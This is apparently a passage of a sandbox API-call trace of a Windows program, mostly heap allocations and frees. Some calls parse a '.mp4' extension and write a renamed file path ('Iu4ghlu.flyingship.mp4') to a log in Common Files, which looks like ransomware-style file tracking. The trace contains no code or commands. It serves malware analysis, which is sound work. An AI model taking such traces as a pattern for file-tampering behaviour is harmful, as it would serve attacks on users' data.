0x8e1b50 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0161.988] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0161.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0161.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0161.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0161.989] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0161.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0161.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0161.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0161.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0161.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0161.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.990] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.990] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0161.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0161.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0161.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0161.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0161.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0161.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0161.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0161.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0161.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0161.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0161.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0161.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0161.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0161.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0161.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.992] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0161.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0161.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0161.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0161.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0161.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0161.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0161.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0161.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0161.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0161.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0161.992] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0161.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0161.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0161.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf0) returned 0x8feba8 [0161.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0161.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0161.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0161.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0161.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0161.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9c5180 [0161.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.994] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0161.996] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.996] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0161.996] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.996] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0161.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0161.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.997] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0161.997] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x760, lpOverlapped=0x0) returned 1 [0161.997] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0161.997] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.997] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0161.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0161.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0161.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.flyingship.mp4\r\n", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0161.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3f) returned 0x8db180 [0161.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.flyingship.mp4\r\n", cchWideChar=63, lpMultiByteStr=0x8db180, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.flyingship.mp4\r\n", lpUsedDefaultChar=0x0) returned 63 [0161.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0161.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0161.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0161.998] WriteFile (in: hFile=0x138, lpBuffer=0x8db138*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8db138*, lpNumberOfBytesWritten=0x87f43c*=0x3e, lpOverlapped=0x0) returned 1 [0161.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.998] CloseHandle (hObject=0x138) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, 